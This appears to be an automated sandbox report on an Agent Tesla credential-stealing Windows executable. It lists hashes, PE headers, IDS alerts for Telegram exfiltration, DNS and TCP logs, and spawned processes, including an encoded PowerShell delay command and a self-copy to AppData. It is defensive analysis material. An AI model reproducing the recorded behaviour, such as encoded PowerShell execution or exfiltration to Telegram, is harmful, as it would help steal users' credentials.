                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:true
                                        Preview:[ZoneTransfer]....ZoneId=0
                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Entropy (8bit):5.309741607982687
                                        TrID:
                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                        • Win32 Executable (generic) a (10002005/4) 49.75%
                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                        • Windows Screen Saver (13104/52) 0.07%
                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                        File name:izwFjkhFJm.exe
                                        File size:1863168
                                        MD5:ae2a3b41292c66a9dd6f10c874c05293
                                        SHA1:caa30701c5487c2aecfb9b35b1d0e9ea6f3214b6
                                        SHA256:65cc1ea27c733c270dd0497ed9c99896baf50eeafa5e1200889557985bfd87d5
                                        SHA512:54606fce1ce37ca0b4a25dd94abc5cd47be86a498204a0581def8a62f714ea101b817570a456ff7e054a4c8d3de8f3d69a8cd823dfa87515c4690ae229bb6315
                                        SSDEEP:24576:MVlSKtu1Dze6HDpL1J4yMPdxjNbTCUeoTYoTVCo8HkZ3Y8j8W0kWiqMhX2HyQBEO:8NLZzslSQqY5TXKZhSlB
                                        TLSH:0D854CF24193FEC4976F2D4481143A40DC101C6797BC9698FDC92AA793E9978EF9CAB0
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...|..d.................H...$.......f... ........@.. ....................................`................................
                                        Icon Hash:78b87c6c6c606880
                                        Entrypoint:0x5c66f2
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x6417E07C [Mon Mar 20 04:26:36 2023 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                        Instruction
                                        jmp dword ptr [00402000h]
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        Name                                  Virtual Address  Virtual Size  Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT          0x1c6698         0x57          .text
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE        0x1c8000         0x21e8        .rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC       0x1cc000         0xc           .reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                        IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                        IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
                                        IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
                                        Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity     File Type  Entropy              Characteristics
                                        .text   0x2000           0x1c46f8      0x1c4800  False     0.4735319190262431  data       5.272126053067271    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .rsrc   0x1c8000         0x21e8        0x2200    False     0.8832720588235294  data       7.595705097596992    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc  0x1cc000         0xc           0x200     False     0.044921875         data       0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                        Name           RVA       Size    Type                                                                                                          Language  Country
                                        RT_ICON        0x1c8130  0x1c12  PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                        RT_GROUP_ICON  0x1c9d44  0x14    data
                                        RT_VERSION     0x1c9d58  0x2dc   data
                                        RT_MANIFEST    0x1ca034  0x1b4   XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (433), with no line terminators
                                        DLL          Import
                                        mscoree.dll  _CorExeMain
                                        Timestamp                 Protocol  SID      Message                                  Source Port  Dest Port  Source IP    Dest IP
                                        03/20/23-18:33:24.869717  TCP       2851779  ETPRO TROJAN Agent Tesla Telegram Exfil  49715        443        192.168.2.3  149.154.167.220
                                        03/20/23-18:31:36.462231  TCP       2851779  ETPRO TROJAN Agent Tesla Telegram Exfil  49701        443        192.168.2.3  149.154.167.220
                                        Timestamp                            Source Port  Dest Port  Source IP        Dest IP
                                        Mar 20, 2023 18:31:27.699748039 CET  49699        443        192.168.2.3      173.231.16.76
                                        Mar 20, 2023 18:31:27.699857950 CET  443          49699      173.231.16.76    192.168.2.3
                                        Mar 20, 2023 18:31:27.699994087 CET  49699        443        192.168.2.3      173.231.16.76
                                        Mar 20, 2023 18:31:27.733558893 CET  49699        443        192.168.2.3      173.231.16.76
                                        Mar 20, 2023 18:31:27.733618975 CET  443          49699      173.231.16.76    192.168.2.3
                                        Mar 20, 2023 18:31:28.379163980 CET  443          49699      173.231.16.76    192.168.2.3
                                        Mar 20, 2023 18:31:28.379291058 CET  49699        443        192.168.2.3      173.231.16.76
                                        Mar 20, 2023 18:31:28.382338047 CET  49699        443        192.168.2.3      173.231.16.76
                                        Mar 20, 2023 18:31:28.382364035 CET  443          49699      173.231.16.76    192.168.2.3
                                        Mar 20, 2023 18:31:28.382752895 CET  443          49699      173.231.16.76    192.168.2.3
                                        Mar 20, 2023 18:31:28.586198092 CET  49699        443        192.168.2.3      173.231.16.76
                                        Mar 20, 2023 18:31:28.648602009 CET  49699        443        192.168.2.3      173.231.16.76
                                        Mar 20, 2023 18:31:28.648667097 CET  443          49699      173.231.16.76    192.168.2.3
                                        Mar 20, 2023 18:31:28.803409100 CET  443          49699      173.231.16.76    192.168.2.3
                                        Mar 20, 2023 18:31:28.803500891 CET  443          49699      173.231.16.76    192.168.2.3
                                        Mar 20, 2023 18:31:28.803656101 CET  49699        443        192.168.2.3      173.231.16.76
                                        Mar 20, 2023 18:31:28.804965973 CET  49699        443        192.168.2.3      173.231.16.76
                                        Mar 20, 2023 18:31:36.293730974 CET  49701        443        192.168.2.3      149.154.167.220
                                        Mar 20, 2023 18:31:36.293807983 CET  443          49701      149.154.167.220  192.168.2.3
                                        Mar 20, 2023 18:31:36.293895960 CET  49701        443        192.168.2.3      149.154.167.220
                                        Mar 20, 2023 18:31:36.294677019 CET  49701        443        192.168.2.3      149.154.167.220
                                        Mar 20, 2023 18:31:36.294722080 CET  443          49701      149.154.167.220  192.168.2.3
                                        Mar 20, 2023 18:31:36.361607075 CET  443          49701      149.154.167.220  192.168.2.3
                                        Mar 20, 2023 18:31:36.361701012 CET  49701        443        192.168.2.3      149.154.167.220
                                        Mar 20, 2023 18:31:36.367089987 CET  49701        443        192.168.2.3      149.154.167.220
                                        Mar 20, 2023 18:31:36.367127895 CET  443          49701      149.154.167.220  192.168.2.3
                                        Mar 20, 2023 18:31:36.367513895 CET  443          49701      149.154.167.220  192.168.2.3
                                        Mar 20, 2023 18:31:36.428234100 CET  49701        443        192.168.2.3      149.154.167.220
                                        Mar 20, 2023 18:31:36.428277969 CET  443          49701      149.154.167.220  192.168.2.3
                                        Mar 20, 2023 18:31:36.455465078 CET  443          49701      149.154.167.220  192.168.2.3
                                        Mar 20, 2023 18:31:36.462035894 CET  49701        443        192.168.2.3      149.154.167.220
                                        Mar 20, 2023 18:31:36.462074995 CET  443          49701      149.154.167.220  192.168.2.3
                                        Mar 20, 2023 18:31:36.567434072 CET  443          49701      149.154.167.220  192.168.2.3
                                        Mar 20, 2023 18:31:36.567543983 CET  443          49701      149.154.167.220  192.168.2.3
                                        Mar 20, 2023 18:31:36.568159103 CET  49701        443        192.168.2.3      149.154.167.220
                                        Mar 20, 2023 18:31:36.568188906 CET  443          49701      149.154.167.220  192.168.2.3
                                        Mar 20, 2023 18:31:36.568207979 CET  49701        443        192.168.2.3      149.154.167.220
                                        Mar 20, 2023 18:31:36.568258047 CET  49701        443        192.168.2.3      149.154.167.220
                                        Mar 20, 2023 18:32:35.641273975 CET  49702        443        192.168.2.3      173.231.16.76
                                        Mar 20, 2023 18:32:35.641380072 CET  443          49702      173.231.16.76    192.168.2.3
                                        Mar 20, 2023 18:32:35.641500950 CET  49702        443        192.168.2.3      173.231.16.76
                                        Mar 20, 2023 18:32:35.658441067 CET  49702        443        192.168.2.3      173.231.16.76
                                        Mar 20, 2023 18:32:35.658540964 CET  443          49702      173.231.16.76    192.168.2.3
                                        Mar 20, 2023 18:32:36.303930998 CET  443          49702      173.231.16.76    192.168.2.3
                                        Mar 20, 2023 18:32:36.304028988 CET  49702        443        192.168.2.3      173.231.16.76
                                        Mar 20, 2023 18:32:36.306864977 CET  49702        443        192.168.2.3      173.231.16.76
                                        Mar 20, 2023 18:32:36.306899071 CET  443          49702      173.231.16.76    192.168.2.3
                                        Mar 20, 2023 18:32:36.307337046 CET  443          49702      173.231.16.76    192.168.2.3
                                        Mar 20, 2023 18:32:36.514731884 CET  443          49702      173.231.16.76    192.168.2.3
                                        Mar 20, 2023 18:32:36.514903069 CET  49702        443        192.168.2.3      173.231.16.76
                                        Mar 20, 2023 18:32:36.752813101 CET  49702        443        192.168.2.3      173.231.16.76
                                        Mar 20, 2023 18:32:36.752886057 CET  443          49702      173.231.16.76    192.168.2.3
                                        Mar 20, 2023 18:32:37.603478909 CET  443          49702      173.231.16.76    192.168.2.3
                                        Mar 20, 2023 18:32:37.603661060 CET  443          49702      173.231.16.76    192.168.2.3
                                        Mar 20, 2023 18:32:37.603812933 CET  49702        443        192.168.2.3      173.231.16.76
                                        Mar 20, 2023 18:32:37.608839989 CET  49702        443        192.168.2.3      173.231.16.76
                                        Mar 20, 2023 18:33:23.255290031 CET  49714        443        192.168.2.3      173.231.16.76
                                        Mar 20, 2023 18:33:23.255369902 CET  443          49714      173.231.16.76    192.168.2.3
                                        Mar 20, 2023 18:33:23.255475044 CET  49714        443        192.168.2.3      173.231.16.76
                                        Mar 20, 2023 18:33:23.258941889 CET  49714        443        192.168.2.3      173.231.16.76
                                        Mar 20, 2023 18:33:23.259001017 CET  443          49714      173.231.16.76    192.168.2.3
                                        Mar 20, 2023 18:33:23.901695013 CET  443          49714      173.231.16.76    192.168.2.3
                                        Mar 20, 2023 18:33:23.901845932 CET  49714        443        192.168.2.3      173.231.16.76
                                        Mar 20, 2023 18:33:23.904732943 CET  49714        443        192.168.2.3      173.231.16.76
                                        Mar 20, 2023 18:33:23.904772043 CET  443          49714      173.231.16.76    192.168.2.3
                                        Mar 20, 2023 18:33:23.905273914 CET  443          49714      173.231.16.76    192.168.2.3
                                        Mar 20, 2023 18:33:23.941174984 CET  49714        443        192.168.2.3      173.231.16.76
                                        Mar 20, 2023 18:33:23.941207886 CET  443          49714      173.231.16.76    192.168.2.3
                                        Mar 20, 2023 18:33:24.256023884 CET  443          49714      173.231.16.76    192.168.2.3
                                        Mar 20, 2023 18:33:24.256136894 CET  443          49714      173.231.16.76    192.168.2.3
                                        Mar 20, 2023 18:33:24.256246090 CET  49714        443        192.168.2.3      173.231.16.76
                                        Mar 20, 2023 18:33:24.257375956 CET  49714        443        192.168.2.3      173.231.16.76
                                        Mar 20, 2023 18:33:24.753156900 CET  49715        443        192.168.2.3      149.154.167.220
                                        Mar 20, 2023 18:33:24.753216028 CET  443          49715      149.154.167.220  192.168.2.3
                                        Mar 20, 2023 18:33:24.753302097 CET  49715        443        192.168.2.3      149.154.167.220
                                        Mar 20, 2023 18:33:24.753787041 CET  49715        443        192.168.2.3      149.154.167.220
                                        Mar 20, 2023 18:33:24.753807068 CET  443          49715      149.154.167.220  192.168.2.3
                                        Mar 20, 2023 18:33:24.817501068 CET  443          49715      149.154.167.220  192.168.2.3
                                        Mar 20, 2023 18:33:24.817751884 CET  49715        443        192.168.2.3      149.154.167.220
                                        Mar 20, 2023 18:33:24.820658922 CET  49715        443        192.168.2.3      149.154.167.220
                                        Mar 20, 2023 18:33:24.820687056 CET  443          49715      149.154.167.220  192.168.2.3
                                        Mar 20, 2023 18:33:24.821106911 CET  443          49715      149.154.167.220  192.168.2.3
                                        Mar 20, 2023 18:33:24.823626995 CET  49715        443        192.168.2.3      149.154.167.220
                                        Mar 20, 2023 18:33:24.823657036 CET  443          49715      149.154.167.220  192.168.2.3
                                        Mar 20, 2023 18:33:24.869210958 CET  443          49715      149.154.167.220  192.168.2.3
                                        Mar 20, 2023 18:33:24.869610071 CET  49715        443        192.168.2.3      149.154.167.220
                                        Mar 20, 2023 18:33:24.869642973 CET  443          49715      149.154.167.220  192.168.2.3
                                        Mar 20, 2023 18:33:24.982460022 CET  443          49715      149.154.167.220  192.168.2.3
                                        Mar 20, 2023 18:33:24.982655048 CET  443          49715      149.154.167.220  192.168.2.3
                                        Mar 20, 2023 18:33:24.982764006 CET  49715        443        192.168.2.3      149.154.167.220
                                        Mar 20, 2023 18:33:24.983042955 CET  49715        443        192.168.2.3      149.154.167.220
                                        Timestamp                            Source Port  Dest Port  Source IP    Dest IP
                                        Mar 20, 2023 18:31:27.614362001 CET  58921        53         192.168.2.3  8.8.8.8
                                        Mar 20, 2023 18:31:27.633577108 CET  53           58921      8.8.8.8      192.168.2.3
                                        Mar 20, 2023 18:31:27.642391920 CET  62704        53         192.168.2.3  8.8.8.8
                                        Mar 20, 2023 18:31:27.665841103 CET  53           62704      8.8.8.8      192.168.2.3
                                        Mar 20, 2023 18:31:36.269547939 CET  57840        53         192.168.2.3  8.8.8.8
                                        Mar 20, 2023 18:31:36.289082050 CET  53           57840      8.8.8.8      192.168.2.3
                                        Mar 20, 2023 18:32:35.568073988 CET  57990        53         192.168.2.3  8.8.8.8
                                        Mar 20, 2023 18:32:35.586179972 CET  53           57990      8.8.8.8      192.168.2.3
                                        Mar 20, 2023 18:32:35.607027054 CET  52387        53         192.168.2.3  8.8.8.8
                                        Mar 20, 2023 18:32:35.627496004 CET  53           52387      8.8.8.8      192.168.2.3
                                        Mar 20, 2023 18:33:23.202795029 CET  49302        53         192.168.2.3  8.8.8.8
                                        Mar 20, 2023 18:33:23.222448111 CET  53           49302      8.8.8.8      192.168.2.3
                                        Mar 20, 2023 18:33:23.229949951 CET  53975        53         192.168.2.3  8.8.8.8
                                        Mar 20, 2023 18:33:23.249663115 CET  53           53975      8.8.8.8      192.168.2.3
                                        Mar 20, 2023 18:33:24.733335972 CET  51139        53         192.168.2.3  8.8.8.8
                                        Mar 20, 2023 18:33:24.752517939 CET  53           51139      8.8.8.8      192.168.2.3
                                        Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name              Type            Class        DNS over HTTPS
                                        Mar 20, 2023 18:31:27.614362001 CET  192.168.2.3  8.8.8.8  0x19fc    Standard query (0)  api.ipify.org     A (IP address)  IN (0x0001)  false
                                        Mar 20, 2023 18:31:27.642391920 CET  192.168.2.3  8.8.8.8  0xa091    Standard query (0)  api.ipify.org     A (IP address)  IN (0x0001)  false
                                        Mar 20, 2023 18:31:36.269547939 CET  192.168.2.3  8.8.8.8  0x71bc    Standard query (0)  api.telegram.org  A (IP address)  IN (0x0001)  false
                                        Mar 20, 2023 18:32:35.568073988 CET  192.168.2.3  8.8.8.8  0x38bc    Standard query (0)  api.ipify.org     A (IP address)  IN (0x0001)  false
                                        Mar 20, 2023 18:32:35.607027054 CET  192.168.2.3  8.8.8.8  0xc297    Standard query (0)  api.ipify.org     A (IP address)  IN (0x0001)  false
                                        Mar 20, 2023 18:33:23.202795029 CET  192.168.2.3  8.8.8.8  0x7ad3    Standard query (0)  api.ipify.org     A (IP address)  IN (0x0001)  false
                                        Mar 20, 2023 18:33:23.229949951 CET  192.168.2.3  8.8.8.8  0xf168    Standard query (0)  api.ipify.org     A (IP address)  IN (0x0001)  false
                                        Mar 20, 2023 18:33:24.733335972 CET  192.168.2.3  8.8.8.8  0x2cfe    Standard query (0)  api.telegram.org  A (IP address)  IN (0x0001)  false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 20, 2023 18:31:27.633577108 CET | 8.8.8.8 | 192.168.2.3 | 0x19fc | No error (0) | api.ipify.org | api4.ipify.org | | CNAME (Canonical name) | IN (0x0001) | false
Mar 20, 2023 18:31:27.633577108 CET | 8.8.8.8 | 192.168.2.3 | 0x19fc | No error (0) | api4.ipify.org | | 173.231.16.76 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:31:27.633577108 CET | 8.8.8.8 | 192.168.2.3 | 0x19fc | No error (0) | api4.ipify.org | | 64.185.227.155 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:31:27.633577108 CET | 8.8.8.8 | 192.168.2.3 | 0x19fc | No error (0) | api4.ipify.org | | 104.237.62.211 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:31:27.665841103 CET | 8.8.8.8 | 192.168.2.3 | 0xa091 | No error (0) | api.ipify.org | api4.ipify.org | | CNAME (Canonical name) | IN (0x0001) | false
Mar 20, 2023 18:31:27.665841103 CET | 8.8.8.8 | 192.168.2.3 | 0xa091 | No error (0) | api4.ipify.org | | 64.185.227.155 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:31:27.665841103 CET | 8.8.8.8 | 192.168.2.3 | 0xa091 | No error (0) | api4.ipify.org | | 173.231.16.76 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:31:27.665841103 CET | 8.8.8.8 | 192.168.2.3 | 0xa091 | No error (0) | api4.ipify.org | | 104.237.62.211 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:31:36.289082050 CET | 8.8.8.8 | 192.168.2.3 | 0x71bc | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:32:35.586179972 CET | 8.8.8.8 | 192.168.2.3 | 0x38bc | No error (0) | api.ipify.org | api4.ipify.org | | CNAME (Canonical name) | IN (0x0001) | false
Mar 20, 2023 18:32:35.586179972 CET | 8.8.8.8 | 192.168.2.3 | 0x38bc | No error (0) | api4.ipify.org | | 173.231.16.76 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:32:35.586179972 CET | 8.8.8.8 | 192.168.2.3 | 0x38bc | No error (0) | api4.ipify.org | | 104.237.62.211 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:32:35.586179972 CET | 8.8.8.8 | 192.168.2.3 | 0x38bc | No error (0) | api4.ipify.org | | 64.185.227.155 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:32:35.627496004 CET | 8.8.8.8 | 192.168.2.3 | 0xc297 | No error (0) | api.ipify.org | api4.ipify.org | | CNAME (Canonical name) | IN (0x0001) | false
Mar 20, 2023 18:32:35.627496004 CET | 8.8.8.8 | 192.168.2.3 | 0xc297 | No error (0) | api4.ipify.org | | 104.237.62.211 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:32:35.627496004 CET | 8.8.8.8 | 192.168.2.3 | 0xc297 | No error (0) | api4.ipify.org | | 173.231.16.76 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:32:35.627496004 CET | 8.8.8.8 | 192.168.2.3 | 0xc297 | No error (0) | api4.ipify.org | | 64.185.227.155 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:33:23.222448111 CET | 8.8.8.8 | 192.168.2.3 | 0x7ad3 | No error (0) | api.ipify.org | api4.ipify.org | | CNAME (Canonical name) | IN (0x0001) | false
Mar 20, 2023 18:33:23.222448111 CET | 8.8.8.8 | 192.168.2.3 | 0x7ad3 | No error (0) | api4.ipify.org | | 173.231.16.76 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:33:23.222448111 CET | 8.8.8.8 | 192.168.2.3 | 0x7ad3 | No error (0) | api4.ipify.org | | 64.185.227.155 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:33:23.222448111 CET | 8.8.8.8 | 192.168.2.3 | 0x7ad3 | No error (0) | api4.ipify.org | | 104.237.62.211 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:33:23.249663115 CET | 8.8.8.8 | 192.168.2.3 | 0xf168 | No error (0) | api.ipify.org | api4.ipify.org | | CNAME (Canonical name) | IN (0x0001) | false
Mar 20, 2023 18:33:23.249663115 CET | 8.8.8.8 | 192.168.2.3 | 0xf168 | No error (0) | api4.ipify.org | | 104.237.62.211 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:33:23.249663115 CET | 8.8.8.8 | 192.168.2.3 | 0xf168 | No error (0) | api4.ipify.org | | 173.231.16.76 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:33:23.249663115 CET | 8.8.8.8 | 192.168.2.3 | 0xf168 | No error (0) | api4.ipify.org | | 64.185.227.155 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:33:24.752517939 CET | 8.8.8.8 | 192.168.2.3 | 0x2cfe | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
                                        • api.ipify.org
                                        • api.telegram.org


                                        Target ID:0
                                        Start time:18:30:47
                                        Start date:20/03/2023
                                        Path:C:\Users\user\Desktop\izwFjkhFJm.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\Desktop\izwFjkhFJm.exe
                                        Imagebase:0x3d0000
                                        File size:1863168 bytes
                                        MD5 hash:AE2A3B41292C66A9DD6F10C874C05293
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Yara matches:
                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000000.00000002.336146048.0000000005440000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                        Reputation:low

                                        Target ID:1
                                        Start time:18:30:57
                                        Start date:20/03/2023
                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                                        Imagebase:0x1350000
                                        File size:430592 bytes
                                        MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Reputation:high

                                        Target ID:2
                                        Start time:18:30:57
                                        Start date:20/03/2023
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff745070000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Target ID:12
                                        Start time:18:31:25
                                        Start date:20/03/2023
                                        Path:C:\Users\user\Desktop\izwFjkhFJm.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Users\user\Desktop\izwFjkhFJm.exe
                                        Imagebase:0x50000
                                        File size:1863168 bytes
                                        MD5 hash:AE2A3B41292C66A9DD6F10C874C05293
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low

                                        Target ID:13
                                        Start time:18:31:25
                                        Start date:20/03/2023
                                        Path:C:\Users\user\Desktop\izwFjkhFJm.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Users\user\Desktop\izwFjkhFJm.exe
                                        Imagebase:0xb0000
                                        File size:1863168 bytes
                                        MD5 hash:AE2A3B41292C66A9DD6F10C874C05293
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low

                                        Target ID:14
                                        Start time:18:31:26
                                        Start date:20/03/2023
                                        Path:C:\Users\user\Desktop\izwFjkhFJm.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Users\user\Desktop\izwFjkhFJm.exe
                                        Imagebase:0x3d0000
                                        File size:1863168 bytes
                                        MD5 hash:AE2A3B41292C66A9DD6F10C874C05293
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low

                                        Target ID:15
                                        Start time:18:31:26
                                        Start date:20/03/2023
                                        Path:C:\Users\user\Desktop\izwFjkhFJm.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\Desktop\izwFjkhFJm.exe
                                        Imagebase:0xd60000
                                        File size:1863168 bytes
                                        MD5 hash:AE2A3B41292C66A9DD6F10C874C05293
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Yara matches:
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.530484456.0000000003248000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.530484456.0000000003248000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:low

                                        Target ID:16
                                        Start time:18:31:33
                                        Start date:20/03/2023
                                        Path:C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe"
                                        Imagebase:0xcf0000
                                        File size:1863168 bytes
                                        MD5 hash:AE2A3B41292C66A9DD6F10C874C05293
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:.Net C# or VB.NET
                                        Antivirus matches:
                                        • Detection: 100%, Joe Sandbox ML
                                        • Detection: 53%, Virustotal
                                        • Detection: 33%, ReversingLabs
                                        Reputation:low

                                        Target ID:17
                                        Start time:18:31:42
                                        Start date:20/03/2023
